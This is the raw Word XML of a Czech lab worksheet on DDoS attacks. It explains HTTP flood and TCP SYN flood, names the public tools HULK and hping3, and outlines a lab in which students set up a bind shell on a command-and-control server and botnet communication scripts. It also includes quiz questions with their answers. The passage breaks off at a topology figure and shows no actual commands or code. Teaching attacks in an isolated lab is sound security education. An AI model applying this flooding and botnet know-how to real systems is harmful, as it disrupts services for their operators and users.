      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="1084E807" w14:textId="5E335429" w:rsidR="003E0DBB" w:rsidRDefault="004F1A43" w:rsidP="004F1A43">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0DBB">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tento pracovní list slouží </w:t>
      </w:r>
      <w:r w:rsidR="00C663EA">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>na</w:t>
      </w:r>
      <w:r w:rsidRPr="003E0DBB">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> procvičení základních znalostí ohledně </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E0DBB">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E0DBB">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> útocích, Command and Control serverech a specificky se zaobírá HTTP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E0DBB">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E0DBB">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> a TCP SYN </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E0DBB">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E0DBB">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> útokům.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C278496" w14:textId="67EF2F2A" w:rsidR="003E0DBB" w:rsidRPr="003E0DBB" w:rsidRDefault="003E0DBB" w:rsidP="004F1A43">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">V průběhu práce student </w:t>
      </w:r>
      <w:r w:rsidRPr="00A91846">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>bude konfigurovat základní prvky pro nadstavbu scénářů</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, nastaví scripty pro funkčnost celého útoku jako, bind shell na CnC server a scripty pro komunikaci s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>botnetem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1B6264" w14:textId="7D928FE1" w:rsidR="00E00C31" w:rsidRDefault="003E0DBB" w:rsidP="004F1A43">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0DBB">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Na konci této práce by student měl mít větší porozumění o těchto útocích</w:t>
      </w:r>
      <w:r w:rsidR="00A91846">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003E0DBB">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> jak jejich chování funguje a co </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">mohou způsobit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00228D89" w14:textId="77777777" w:rsidR="00FB4D6F" w:rsidRPr="003E0DBB" w:rsidRDefault="00FB4D6F" w:rsidP="00FB4D6F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19D6DD9A" w14:textId="32C3C57B" w:rsidR="00E00C31" w:rsidRDefault="004F1A43" w:rsidP="004F1A43">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc192341153"/>
      <w:r>
        <w:t>Potřebné materiály</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="63001DE8" w14:textId="1DFB9753" w:rsidR="00E00C31" w:rsidRDefault="003E0DBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="68"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Software pro virtualizaci (VirtualBox)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364B1756" w14:textId="339AA654" w:rsidR="00A91846" w:rsidRDefault="00A91846" w:rsidP="00A91846">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="68"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Místo pro virtuální stroje </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r>
        <w:t>50 GB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC91B3A" w14:textId="4CA4C2E4" w:rsidR="00D12324" w:rsidRDefault="00C663EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="68"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pro </w:t>
      </w:r>
      <w:r w:rsidR="00066DC0">
        <w:t>přednášející</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – software</w:t>
      </w:r>
      <w:r w:rsidR="00D12324">
        <w:t xml:space="preserve"> pro konfiguraci routeru (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D12324">
        <w:t>WinBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D12324">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B50A53" w14:textId="42AB2292" w:rsidR="00746349" w:rsidRDefault="00C663EA" w:rsidP="00022F94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="68"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pro </w:t>
      </w:r>
      <w:r w:rsidR="00066DC0">
        <w:t>přednášející</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – o</w:t>
      </w:r>
      <w:r w:rsidR="00FB4D6F">
        <w:t>brazy Ubuntu server, Kali a RouterOS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B09E3A" w14:textId="14422428" w:rsidR="00A91846" w:rsidRDefault="00A91846">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4871CA5A" w14:textId="77777777" w:rsidR="00FB4D6F" w:rsidRDefault="00FB4D6F" w:rsidP="00FB4D6F">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="596899C9" w14:textId="0C61A997" w:rsidR="00092334" w:rsidRDefault="00092334" w:rsidP="00092334">
      <w:pPr>
        <w:pStyle w:val="Nadpis1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc192341154"/>
      <w:r>
        <w:t>Teoretické informace</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="3B85FAFB" w14:textId="327CD663" w:rsidR="00092334" w:rsidRPr="00092334" w:rsidRDefault="00092334" w:rsidP="00092334">
      <w:r>
        <w:t>V této části se seznámíte s použitými útoky (jek fungují a co obsahují.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC5FE47" w14:textId="1DC852BE" w:rsidR="00092334" w:rsidRDefault="00092334" w:rsidP="00092334">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc192341155"/>
      <w:r>
        <w:t xml:space="preserve">DOS typu HTTP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>flood</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F6A1E2E" w14:textId="106EC2DB" w:rsidR="00092334" w:rsidRPr="00092334" w:rsidRDefault="00092334" w:rsidP="00092334">
      <w:r w:rsidRPr="00092334">
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00092334">
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00092334">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cílí </w:t>
      </w:r>
      <w:r w:rsidRPr="00092334">
        <w:t>na aplikační vrstvu (7. vrstva OSI modelu). Útočník využívá zdánlivě legitimní HTTP požadavky k přetížení cílového serveru a jeho vyčerpání. Tento typ útoku je obtížné detekovat, protože požadavky napodobují běžný provoz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5514C405" w14:textId="77777777" w:rsidR="00092334" w:rsidRPr="00092334" w:rsidRDefault="00092334" w:rsidP="00092334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00092334">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Princip útoku:</w:t>
      </w:r>
      <w:r w:rsidRPr="00092334">
        <w:t xml:space="preserve"> Útočník zasílá velké množství HTTP GET nebo POST požadavků na cílový server. Server je nucen zpracovávat každý požadavek, což vede k přetížení procesoru a paměti a následné nedostupnosti služby pro legitimní uživatele.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B0D0A8" w14:textId="37536222" w:rsidR="00092334" w:rsidRPr="00092334" w:rsidRDefault="00F902C1" w:rsidP="00092334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Veřejně p</w:t>
      </w:r>
      <w:r w:rsidR="00092334" w:rsidRPr="00092334">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>oužívané nástroje:</w:t>
      </w:r>
      <w:r w:rsidR="00092334" w:rsidRPr="00092334">
        <w:t xml:space="preserve"> Mezi běžné nástroje patří HULK (HTTP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00092334" w:rsidRPr="00092334">
        <w:t>Unbearable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00092334" w:rsidRPr="00092334">
        <w:t xml:space="preserve"> Load King), který generuje unikátní HTTP požadavky v nepravidelných intervalech, což činí útok obtížně filtrovatelným.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52417287" w14:textId="62EF2BD8" w:rsidR="00092334" w:rsidRPr="00092334" w:rsidRDefault="00092334" w:rsidP="00092334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00092334">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dopad:</w:t>
      </w:r>
      <w:r w:rsidRPr="00092334">
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00092334">
        <w:t>lood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00092334">
        <w:t xml:space="preserve"> může dramaticky zvýšit odezvu serveru nebo jej zcela přetížit, což způsobuje výpadek poskytované služby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDECB17" w14:textId="052707A5" w:rsidR="00092334" w:rsidRDefault="00710158" w:rsidP="00092334">
      <w:r>
        <w:t xml:space="preserve">Otázka </w:t>
      </w:r>
      <w:r w:rsidR="009A75C7">
        <w:t>t.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00710158">
        <w:t>Jak ovlivňuje server</w:t>
      </w:r>
      <w:r w:rsidR="00E04885">
        <w:t xml:space="preserve"> DoS útok</w:t>
      </w:r>
      <w:r w:rsidRPr="00710158">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400AF47F" w14:textId="2C25CF4F" w:rsidR="00E04885" w:rsidRPr="00E04885" w:rsidRDefault="00E04885" w:rsidP="00092334">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Zvýší se jeho odezva, nebo se útokem přetíží)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084A0535" w14:textId="1CA9FBEA" w:rsidR="00710158" w:rsidRDefault="00710158" w:rsidP="00710158">
      <w:r>
        <w:t xml:space="preserve">Otázka </w:t>
      </w:r>
      <w:r w:rsidR="009A75C7">
        <w:t>t.</w:t>
      </w:r>
      <w:r>
        <w:t>2: Na jakém portu většinou běží webové služby?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DECA8D1" w14:textId="1AFF3365" w:rsidR="00E04885" w:rsidRPr="00E04885" w:rsidRDefault="00E04885" w:rsidP="00710158">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
        <w:t>(port 80/443)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CF7A37" w14:textId="586D812C" w:rsidR="00710158" w:rsidRDefault="00EE7246" w:rsidP="00092334">
      <w:r>
        <w:t xml:space="preserve">Otázka </w:t>
      </w:r>
      <w:r w:rsidR="009A75C7">
        <w:t>t.</w:t>
      </w:r>
      <w:r>
        <w:t>3: Jak</w:t>
      </w:r>
      <w:r w:rsidR="00E04885">
        <w:t>ý</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E04885">
        <w:t xml:space="preserve">je například </w:t>
      </w:r>
      <w:r>
        <w:t>znám</w:t>
      </w:r>
      <w:r w:rsidR="00E04885">
        <w:t>ý</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E04885">
        <w:t>(free)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nástroj pro zachycení síťového provozu?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8D4699" w14:textId="222D8C0C" w:rsidR="00E04885" w:rsidRPr="00E04885" w:rsidRDefault="00E04885" w:rsidP="00E04885">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6955683B" w14:textId="77777777" w:rsidR="00710158" w:rsidRPr="00092334" w:rsidRDefault="00710158" w:rsidP="00092334"/>
    <w:p w14:paraId="7687CC31" w14:textId="501B2F26" w:rsidR="00092334" w:rsidRDefault="00092334" w:rsidP="00092334">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc192341156"/>
      <w:r>
        <w:t xml:space="preserve">DOS typu TCP SYN </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>flood</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="342ACADA" w14:textId="399EB6F8" w:rsidR="00092334" w:rsidRPr="00092334" w:rsidRDefault="00092334" w:rsidP="00092334">
      <w:r w:rsidRPr="00092334">
        <w:t xml:space="preserve">TCP SYN </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00092334">
        <w:t>Flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00092334">
        <w:t xml:space="preserve"> je protokolový útok, který zneužívá slabinu v procesu navazování spojení v síťovém protokolu TCP (tzv. „</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00092334">
        <w:t>three-way</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00092334">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00092334">
        <w:t>handshake</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00092334">
        <w:t>“). Tento útok operuje na transportní vrstvě (4. vrstva OSI modelu).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B4CCE2" w14:textId="77777777" w:rsidR="00092334" w:rsidRPr="00092334" w:rsidRDefault="00092334" w:rsidP="00092334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00092334">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Princip útoku:</w:t>
      </w:r>
      <w:r w:rsidRPr="00092334">
        <w:t xml:space="preserve"> Útočník opakovaně zasílá SYN pakety cílovému serveru a simuluje tak požadavky na otevření spojení. Server odpovídá SYN-ACK paketem a čeká na potvrzení od útočníka (ACK), které však nikdy nepřijde. Tím zůstávají na serveru „polootevřené“ spojení, která zaplňují jeho kapacitu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B24E313" w14:textId="70BF2B2D" w:rsidR="00092334" w:rsidRPr="00092334" w:rsidRDefault="00F902C1" w:rsidP="00092334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Veřejně p</w:t>
      </w:r>
      <w:r w:rsidR="00092334" w:rsidRPr="00092334">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>oužívané nástroje:</w:t>
      </w:r>
      <w:r w:rsidR="00092334" w:rsidRPr="00092334">
        <w:t xml:space="preserve"> Hping3 je oblíbený nástroj pro generování TCP SYN paketů, který umožňuje jejich přizpůsobení podle potřeb útočníka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51283C19" w14:textId="77777777" w:rsidR="00092334" w:rsidRPr="00092334" w:rsidRDefault="00092334" w:rsidP="00092334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00092334">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dopad:</w:t>
      </w:r>
      <w:r w:rsidRPr="00092334">
        <w:t xml:space="preserve"> Server může být přetížený velkým množstvím polootevřených spojení, což omezuje jeho schopnost reagovat na legitimní uživatele. Výsledkem je nedostupnost služby a narušení provozu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B501071" w14:textId="6373A898" w:rsidR="00092334" w:rsidRDefault="00092334" w:rsidP="00092334">
      <w:r>
        <w:t xml:space="preserve">Otázka </w:t>
      </w:r>
      <w:r w:rsidR="009A75C7">
        <w:t>t.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00E04885">
        <w:t xml:space="preserve">Na jaké vrstvě ISO/OSI běží TCP SYN </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E04885">
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E04885">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A76B05" w14:textId="0E8CDF35" w:rsidR="00E04885" w:rsidRDefault="00E04885" w:rsidP="00E04885">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009A75C7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Na 4. vrstvě</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479B8249" w14:textId="3D16953F" w:rsidR="009A75C7" w:rsidRDefault="009A75C7" w:rsidP="009A75C7">
      <w:r>
        <w:t>Otázka t.5: Jako útočník, posíláme poslední ACK?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53356076" w14:textId="0F44B788" w:rsidR="009A75C7" w:rsidRPr="00E04885" w:rsidRDefault="009A75C7" w:rsidP="009A75C7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Ne, abychom nechali spojení otevřené)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AFB6AF" w14:textId="0405ACA7" w:rsidR="00710158" w:rsidRDefault="00710158" w:rsidP="00092334">
      <w:r>
        <w:t xml:space="preserve">Otázka </w:t>
      </w:r>
      <w:r w:rsidR="009A75C7">
        <w:t>t.6</w:t>
      </w:r>
      <w:r>
        <w:t>: Co se stane v normálním „</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>three</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>way</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>handshake</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">“ protokolu </w:t>
      </w:r>
      <w:r w:rsidR="00E04885">
        <w:t>po poslání značky</w:t>
      </w:r>
      <w:r>
        <w:t> ACK, pokud ho další strana neo</w:t>
      </w:r>
      <w:r w:rsidR="00E04885">
        <w:t>bdrží?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B74DEDB" w14:textId="670766E8" w:rsidR="009A75C7" w:rsidRPr="009A75C7" w:rsidRDefault="009A75C7" w:rsidP="009A75C7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Po vypršení </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>timeru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> se pošle ACK znova)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239D0229" w14:textId="77777777" w:rsidR="00092334" w:rsidRDefault="00092334" w:rsidP="00370D9C">
      <w:pPr>
        <w:pStyle w:val="Nadpis1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C465997" w14:textId="226FE94C" w:rsidR="00746349" w:rsidRPr="00746349" w:rsidRDefault="00FB4D6F" w:rsidP="009A75C7">
      <w:pPr>
        <w:pStyle w:val="Nadpis1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc192341157"/>
      <w:r w:rsidRPr="00B52016">
        <w:t>Instrukce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="217364C2" w14:textId="0ADD52F6" w:rsidR="00FB4D6F" w:rsidRDefault="00370D9C" w:rsidP="00FB4D6F">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc192341159"/>
      <w:r>
        <w:t xml:space="preserve">Část </w:t>
      </w:r>
      <w:r w:rsidR="009A75C7">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005C048C">
        <w:t>Popis topologie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="6C355955" w14:textId="77777777" w:rsidR="00FB4D6F" w:rsidRDefault="00FB4D6F" w:rsidP="00FB4D6F">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="68"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A662B9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="610EA58D" wp14:editId="46D0B0EF">
            <wp:extent cx="4822166" cy="3737591"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="618246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6055" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
